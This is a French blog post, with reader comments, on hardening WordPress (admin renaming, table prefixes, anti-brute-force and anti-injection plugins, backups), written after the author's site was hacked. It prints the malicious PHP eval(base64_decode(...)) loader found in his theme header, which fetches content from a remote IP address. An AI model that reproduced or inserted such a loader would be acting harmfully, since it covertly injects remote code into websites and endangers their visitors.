Sécuriser WordPress : Comment faire ?

38 2820

On dit que le pagerank n’apporte rien… Mais depuis que le site est passé pagerank 3, je suis sollicité … Mais pas par des annonceurs, non non, fin de semaine j’ai encore malgré ma sécurité, essuyé une tentative d’intrusion sur mon site, je vais donc vous expliquer comment sécuriser WordPress, pour vous éviter de subir ce viol.

Sécuriser WordPress ?

En effet, un hack (faiblesse d’un plugin ou de mon thème ?) me donnait un bout de code php sur mon header…

< ?php eval (base64_decode(« DQoNCnByaW50IEBmaWxlX2dldF9jb250
ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBoc
D91YT0nIC4gQHVybGVuY29kZSgkX? >

J’ai tout de suite contacté Julio Potier de BoiteAweb qui m’annonça que ce code sert à injecter de la pub ou autre code malicieux.

Même si la douleur ne se faisait pas sentir, je me suis rappelé la sensation que j’ai éprouvée lorsqu’on a forcé la porte de cave où je renferme tout mes souvenirs (pas très intéressant apparemment puisqu’ils ne les ont pas volé ^^) et je me suis rappelé comment j’ai sécurisé l’accès juste après.

Car oui, bien souvent on achète une alarme après avoir vu quelqu’un se faire cambrioler, ou quand ça nous arrive à nous…

Alors aujourd’hui je vous incite fortement à m’écouter bande de veinard, car je vous met en garde, et vous donne quelques astuces à mettre en place. Certes vous en trouverez d’autres sur le net, mais chacun sa config.

Astuces pour sécuriser son WordPress

proteger-porte-entree-blind-300x213Astuces non puisque je n’invente rien, mais il me fallait un titre accrocheur, je vais donc vous énumérer les points à revoir pour que votre install WordPress soit moins trouée qu’une passoire.

 

 


  • Virez moi ce « Admin »

Et bien oui la première chose que va tenter de faire un hacker c’est un brute force (technique qui consiste à  scanner les différents pseudo possible ainsi que les mots de passe jusqu’à ce que ça marche), et si vous donnez déjà au Hacker le pseudo que vous utilisez … Bon dois-je vous dire aussi de ne pas utiliser votre pseudo (celui qui apparait lorsque vous postez un article ou répondez à un com). Pareil, votre mot de passe, blindez le dans le genre :

« jesuis_*_sur=que@tu&nele|trouveras¤pas »


  • Modifiez vos préfixes de tables à l’installation, au lieu de wp_ préférez un truc du genre :

« commenttuvasgalerer_ »

Si votre site est déjà installé, suivez ce tuto d’Aurélien de WP channel. Il est préférable (et merci Julio de m’avoir mis la puce à l’oreille sur le pourquoi de ce changement de table) de modifier les préfixes, car les hacker vont d’abord s’en prendre à vos tables sus nommées, en cherchant à les percer.


  • Suite logique : Évitez le brute force de l’administration

Je vous donne en même temps les plugins qu’il faut se procurer pour éviter les intrusions. Là il s’agit de User Locker qui permet d’éviter les tentatives répétées de connexion à votre administration, car le but d’un brute force, c’est justement de scanner jusqu’à ce que ça fasse clic et que la porte s’ouvre.

user locker


  • Ensuite, n’installer pas n’importe quels plugins sur votre site

Favoriser ceux qui ont des mises à jours régulière et faites les ces mises à jour car elles sont importantes, elles résolves peu être des failles de sécurité que les hackers vont exploiter, et choisissez les extensions qui ont un nombre de vote (et de votant) très bon. Un plugin qui n’est pas souvent mis à jour peut contenir des failles de sécurité, si vous désirez une liste de plugins validés pour sécuriser wordpress, vous pouvez contacter notre expert en sécurité WordPress nationnal : Julio Potier.

Justement en parlant de plugin, si vous avez comme moi été victime d’un dépôt de code sur votre site, ou pour éviter d’en faire les frais, voici deux plugins indispensables. Bon tout le monde a compris que j’aime bien Julio, c’est la proximité qui fait ça (Ch’ti représente), mais c’est avant tout pour son travail, et sa rigueur, que je vous conseille :

C’est gratuit mais ça n’empêche pas de faire un don (Julio me paie ma commission en bière)

En détail :

BBQ et CSRF (<= C’est du Ch’ti ça veut dire « Barbecue » et « Comment les Saucisses de Rodrigue sont Fabuleuses ») permettent de bloquer les intrusion de code malicieux, que se soit par voie url ou par voie CRSF (en savoir + ici).

Post Count View lui c’est pour le fun, il s’est incrusté à la fête et vous permet de compter le nombre de vues par article. Vous pouvez même afficher le compteur sur vos articles.

Et pour les sauvegardes de site WordPress

On a beau bien se protéger, notre vie peut prendre une tournure différente si quelqu’un arrive malgré tout à percer l’ovule. Alors comment se prémunir, j’ai la solution, les SAUVEGARDES (Aurélien va avoir les oreilles qui sifflent).

BackWPup – pour les sauvegarde FTP et Sql

J’adore cette extension de sauvegarde WordPress, celle ci prend dans votre ftp, toute la contenance de votre installation WordPress, pour la compresser et vous l’envoyer, soit :

  • Par Mail
  • Sur le FTP (dans un dossier sauvegarde
  • Soit dans un autre FTP (plus malin je trouve ^^)
  • Vers DROPBOX
  •  …

J’ai adoré pouvoir recevoir chaque {mois|semaine|jour|heure} une sauvegarde de mon FTP sur mon bureau dans le dossier DropBox de mon Ordinateur (qui je le rappel peut être géré à distance), donc même si le pirate met le feu chez moi, je peux récupérer ma sauvegarde.

dropbox

Vous recevez tel quel votre dossier ftp :

dropbox-2

Parfait pour revenir le claquer dans un autre hébergement en cas d’urgence.

Télécharger BackWPup

WP-DB-Backup – pour la sauvegarde de la base de données WordPress

Choisissez vos tables à sauvegarder, et recevez les par eMail, la base de données pourra être réinjectée à distance elle aussi.

Ce plugin, je lui fait confiance depuis des années, mais vous en trouverez d’autres en creusant bien. Je dis ça car il n’a pas été mis à jour depuis longtemps, mais fonctionne très bien. Je reçois ma base chaque jour en fichier Zip, et elle se met via filtre dans ma boite mail.

Voilà je pense que c’est bien pour aujourd’hui, je mettrai à jour ci besoin, selon vos commentaires, car vous allez me faire découvrir d’autres pépites je suppose, afin de sécuriser WordPress comme il se doit ?

C’est à vous !

38 Commentaires

  1. Arf si t’étais venu au wordcamp …. t’aurais vu le gus qui dormait et entendu Julio dire les eval dans un template c’est pas normal.
    Enfin tout ça nous permet quand même de ne pas avoir à nous creuser la tête pour trouver les bons plugin ;)
    Marci m’sieur Rodrigue

    • Je regrette vraiment mais j’ai le droit à des séances de rattrapage je te rassure le seul regret est pour les rencontre, je sais que tu as fait le déplacement depuis la Suisse de ton côté.

  2. Salut Rodrigue,
    Merci pour les tuyaux, plugins installés ;)
    Par contre, comment as-tu détecté la tentative d’intrusion ?
    Merci d’avance
    @+ Jérôme

    • A cause d’un Beug dans le thème, qui m’a incité à vérifier le code. J’ai rapidement trouvé.

  3. Merci Rodrigue pour ces infos, c’était justement une de mes préoccupations actuelles donc merci pour la liste des extensions (il y en a déjà quelques une que j’utilise et moi aussi mes sauvegardes arrivent dans ma dropbox,c’est quand même plus rassurant).

    J’ai testé aussi WSD security et merci pour user locker je cherchais justement quelque chose pour éviter le bruteforce.(mais bon avec le failtoban sur le serveur et l’analyse des logs apache hebdomadaire)

    Comme d’habitude j’aime bien tester donc j’ai installé : the mole, wpscan, uniscan, et Havji. C’est d’ailleurs pour ça que je me suis remis sur la sécurité ^^

  4. Ça, c’est un vrai top article qui vaut sont pesant d’or. La sécurité des sites internet (en l’occurrence WordPress) est extrêmement importante car le web représente désormais la plus importante source de propagation des malwares polymorphiques (#RMSS2013).

    Bravo pour cet article Rodrigue ! Et merci !

  5. Je viens d’installer User-locker et block-bad-queries.
    Merci pour ton article car la sécurité d’un site sous wordpress ça devenait une question primordial pour moi mais je ne savais pas trop par où commencer.

    Et merci à Julio pour ses plugins et son boulot ;)

    Je bookmark

  6. Moi j’utilise Wordfence, il est gratuit aussi et c’est un genre de couteau suisse de la sécurité: entre autres il scanne tous les fichiers pour les comparer aux originaux pour vérifier qu’il n’y a pas d’ajout de code, il vérifie qu’il n’y a pas de malware dans les répertoires, il bloque l’accès à certains (admin, plugins, etc), il vérifie les commentaires, il bloque l’accès au site si un mauvais mot de passe est rentré trop de fois, il affiche le trafic en live (y compris les bots) et permet de bloquer certaines ip, etc. Je le trouve vraiment bien fait et facile à utiliser.

    Sinon pour les mots de passe j’utilise Keepass pour tous les enregistrer dans un fichier crypté. C’est vraiment pas contraignant à utiliser, et du coup comme j’ai plus à les retenir (sauf celui qui ouvre le fichier ^^) je peux utiliser des mots à rallonge et les changer régulièrement.

    Il se trouve que j’ai écrit un post pour présenter Keepass récemment:
    http://www.kafeinemarketing.com/protection-informatique/

    La sécurité parfaite n’existe pas, mais en combinant les 2 on se protège déjà contre pas mal de menaces sans avoir à être un expert de la sécurité.

  7. merci Rodrigue encore une fois pour ton article, même si j’ai une connaissance modeste de wordpress, je trouve toujours un plaisir de lire tes articles car il y a de la plus valu en information, il y a de bon conseil dans cet article que je dois impérativement suivre, la sécurité wordpress l’impose :)

  8. Merci Rodrigue pour ce tutorial complet. C’est effectivement un bon moyen pour sécuriser son site WordPress. Normalement, votre hébergeur devrait être capable de filtrer les intrusions et de vous restaurer vos données. Non ?

    • L’herbergeur fait (en tout cas moi c’est le cas) des sauvegardes, mais laisse tomber les démarches qu’il faut faire avant de récupérer ton site.

  9. Bonjour, les astuces données pour sécuriser le site sont bonnes, la liste n’est pas exhaustive bien sûr, aucune ne l’est. Mais au moins ici les conseils sont bons.
    Merci pour les citations de mes plugins gratuits, servez vous, ils sont là pour vous aider.
    Pour les backup je test actuellement ManageWP (http://baw.li/managewp) pour me faciliter la vie et pour le moment je trouve ça excellent !

    • Merci pour ton « approbation ».
      (Je précise que Julio est consultant en sécurité Web, Spécialisé WordPress)
      Donc ton avis devrai conforter beaucoup de monde.
      Merci

  10. Sympa les astuces. Y’en à qui coulent tellement de sources que je me retrouve con de ne pas y avoir pensé avant (genre les préfixes de tables, et le dossier admin). Merci pour les tuyaux

    • Oui j’ai vu que tu avais appliqué les conseils ; )

      Tu auras un bon point !

  11. Pour le coup je suis plutôt d’accord avec @Christian, les plugins anti-bruteforce c’est sympa, mais ça vaut pas un bon vieux .htaccess ;) Pour le reste je suis bien d’accord avec les points abordé dans l’article, bien joué !

  12. […] N’hésitez pas à jouer avec les événements qui font l’actualité, et trouver un terrain d’entente avec votre thématique, ces derniers temps, on parlait beaucoup des hack WordPress, j’ai donc quelques articles qui sont parues en rapport avec la sécurité WordPress. […]

  13. Afin de sécuriser votre site worpress durablement et facilement je vous recommande le plugins de sécurité Itheme security,il détecte automatiquement ce qui ne va pas sur votre site web reste a cliquer pour corriger les problèmes..(anciennement Wp better sécurity)
    Itheme security permet également de renommer le nom du compte administrateur;

Réagis